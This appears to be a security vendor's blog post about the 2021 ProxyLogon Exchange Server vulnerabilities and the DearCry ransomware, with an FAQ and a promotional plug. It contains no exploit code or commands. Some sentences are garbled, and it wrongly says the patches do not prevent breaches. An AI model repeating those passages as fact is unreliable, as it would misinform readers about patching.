Quick Summary: The blog sheds light on hackers exploiting ransomware attacks to target exchange servers. Infiltrating the servers, they coerce a ransom to regain access. The blog profoundly examines the attack’s implications and potential to reshape cybersecurity practices. This incident underscores the pressing need for robust protective measures against evolving hacking techniques. It propels organizations to bolster their security strategies and stay ahead in the ongoing battle against cyber threats.
A worrying trend has evolved in the constantly changing cybersecurity landscape: hackers using exchange servers to launch ransomware attacks. Simple data breaches give way to outright
hacking of crucial systems, which causes chaos and financial instability. This blog explores the risks of ransomware using exchange servers as a delivery system.
Understanding the inner workings of these attacks is essential to bolster our defense strategies. You can get help from Security Testing Services.
In the following pages, we unravel the methods, motives, and potential countermeasures against this emerging breed of cyber threat.
Let’s Discuss some severe issues: Hackers Exchange Servers Ransomware Attack!
Hackers are exploiting vulnerable Exchange servers to drop ransomware attacks, Microsoft says.
Microsoft has warned that hackers exploit recently discovered vulnerabilities in Exchange email servers to drop the ransomware. The move puts tens of thousands of email servers at risk (a Phishing Fraud) of destructive attacks.
In a tweet late Thursday, a tech giant said it detected a new kind of file-encrypting malware called DoejoCrypt or DearCry, which uses the same four vulnerabilities that Microsoft linked to the new China-backed hacking group Hafnium.
When chained together, the vulnerabilities allow the hacker to control a vulnerable system completely.
Hafnium is the “primary” group exploiting flaws, likely for espionage and intelligence gathering. But other security firms say they have seen other hacking groups use the same weaknesses. ESET noted at least the ten groups are actively compromising the Exchange servers.
The new ransomware comes less than a day after security researchers published a proof-of-concept exploit code for the vulnerabilities to the Microsoft-owned GitHub. If the The violates the company’s regulations it gets deleted quickly..
The security researcher at Kryptos Logic said in the tweet that the code worked, albeit with some fixes.
The company RiskIQ reports detecting over 82,000 vulnerable servers as of Thursday, but the number is declining. Furthermore, the company noted that hundreds of servers owned by banks and healthcare companies remain affected, along with over 150 servers within the U.S. federal government.
The company pointed out that this shows a rapid drop compared to the almost 400,000 vulnerable servers that were present when Microsoft first disclosed the vulnerabilities on March 2nd.
Microsoft released security patches last week, but these patches do not prevent hackers from breaching servers. The FBI and CISA, the federal government’s cybersecurity advisory unit, have warned that the vulnerabilities present a significant risk to businesses across the United States.
John Hultquist, vice president of the analysis at FireEye’s Mandiant threat intelligence unit, said he anticipates more than ransomware groups trying to cash in.
What Are The Vulnerabilities And Why Are They Important?
Their ProxyLogon is a severe vulnerability that affects on-premises Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. Microsoft is also updating Exchange Server in 2010 for “defense-in-depth purposes.”
- CVE-2021-26855: CVSS 9.1: The Server Request Forgery (SSRF) vulnerability results in unauthenticated attackers sending crafted HTTP requests. Servers need to be capable of accepting untrusted connections over port 443 for the bugs to activate.
- CVE-2021-26857: CVSS 7.8: the insecure deserialization vulnerability in an Exchange Unified Messaging Service, allowing arbitrary code deployment under SYSTEM.
- CVE-2021-26858: CVSS 7.8: The post-authentication arbitrary file writes vulnerability to write to the paths.
- CVE-2021-27065: CVSS 7.8: The post-authentication arbitrary file writes vulnerability to write to the paths.
If used in the attack chain, these vulnerabilities can lead to Remote Code Execution (RCE), server hijacking, backdoors, data theft, and potentially further malware deployment.
In summary, Microsoft says that the attackers secure access to the Exchange Server either through these bugs or stolen credentials, and they can then create a web shell to hijack the system and execute commands remotely.
“These vulnerabilities are part of the attack chain,” Microsoft says. “The initial attack requires an untrusted Exchange server port 443 connection.
You can protect your system by restricting untrusted connections through the setup of a VPN, which will segregate an Exchange server from external access.
Using this mitigation will only protect against the initial portion of the attack;
If an attacker already has access or can convince administrators to run the malicious file, they can trigger other pieces of the chain.
Who Is Responsible For Known Ransomware Attacks?
Microsoft attributes the tracing of the original attacks using the zero-day flaws to Hafnium.
The company describes Hafnium as a “highly skilled and sophisticated actor,” identifying them as the state-sponsored advanced persistent threat (APT) group from China.
While the Hafnium originates in China, the group uses the web of virtual private servers (VPS) in the U.S. to try and conceal its proper location. Entities previously targeted by the group include think tanks, non-profits, defense contractors, and researchers.
Is It Just The Hafnium?
When zero-day vulnerabilities are revealed and software vendors issue emergency security fixes. The consequences can be substantial, especially when popular software is affected.
Issues often arise due to the awareness of new patches and slow adoption. It also arises due to the reasons why I.T. staff might be unable to implement a fix. This could result from being unaware that an organization utilizes software, third-party libraries, or components at risk. It may also be due to compatibility problems.
Mandiant says further attacks against U.S. targets include local government bodies, universities, engineering companies, and retailers.
The cyber forensics firm believes that attackers could utilize the vulnerabilities for deploying ransomware and stealing data.
Cybersecurity expert Brian Krebs has been informed by sources that hackers have targeted at least 30,000 organizations in the U.S. According to Palo Alto Networks, there were a minimum of 125,000 unpatched servers worldwide as of March 9th.
On March 5, Microsoft said to the company, “continued increased use of these vulnerabilities in the targets of the attacks unpatched systems by multiple malicious actors beyond the Hafnium.”
And On March 11, Check Point Research said that the attack attempts leveraging the vulnerabilities doubled every few hours.
On March 15, CPR said that the attack attempts increased ten times based on the data collected between March 11 and March 15.
The US, Germany, and the U.K. are now the most targeted countries. The Government and military targets accounted for 23% of all exploit attempts, followed by manufacturing, financial services, and software vendors.
As we dissect recent high-profile cases and explore the anatomy of these attacks, a grim reality emerges: the line between data protection and hostage negotiation has blurred as businesses struggle to deal with the growing threats. Companies like BigScal become crucial allies in the battle against such sneaky invasions.
In addition, BigScal’s approach extends beyond traditional security paradigms. They enable businesses to foresee and minimize dangers before they materialize by encouraging a culture of vigilance and continual development.
Combining cutting-edge technology with proactive strategies can stem the rising tide of cyber threats and ensure that exchange servers remain a conduit of communication and innovation rather than a gateway for criminal extortion. Hence, the road ahead is challenging, but with the right allies, we can navigate it towards a safer and more secure digital future.
Do hackers use ransomware?
Yes, hackers often use ransomware as a malicious tool. Ransomware encrypts victims’ data and demands payment to provide the decryption key. It’s a profitable strategy for cybercriminals to extort money from individuals, businesses, and organizations. The victims’ urgency to regain access to their data increases the likelihood of payment. Prevention through cybersecurity measures and regular data backups is crucial to avoid falling victim to such attacks.
What was the Microsoft Exchange hack?
The Microsoft Exchange hack, discovered in early 2021, exploited vulnerabilities in Microsoft Exchange Server software. The cyberattack allowed hackers to gain unauthorized access to email accounts, steal data, and install malware. The attack affected thousands of organizations worldwide. Microsoft released patches to address the vulnerabilities, but the incident highlighted the need for prompt software updates and cybersecurity vigilance to prevent such breaches.
Which vulnerability affects Exchange servers?
One notable vulnerability that affected Exchange servers was known as “ProxyLogon.” It was a set of four zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) discovered in Microsoft Exchange Server software. Exploiting these vulnerabilities allowed unauthorized access, data theft, and installation of web shells by attackers. Microsoft released emergency patches to address these vulnerabilities and urged users to update their systems promptly to prevent potential attacks.
What happens if you don’t pay ransomware?
If you don’t pay ransomware, you risk losing access to your encrypted data permanently. Cybercriminals may delete or destroy your files if the ransom is not paid within their specified timeframe. However, paying the ransom does not guarantee data recovery and may encourage further attacks. It’s important to assess options carefully and prioritize preventive measures like backups and cybersecurity.
Does wiping a computer remove ransomware?
Wiping a computer (formatting the hard drive and reinstalling the operating system) can remove ransomware, as it erases all data, including the encrypted files. However, this should be considered a last resort, as it results in complete data loss. It’s advisable to consult with cybersecurity professionals before taking such drastic measures and to explore data recovery options first.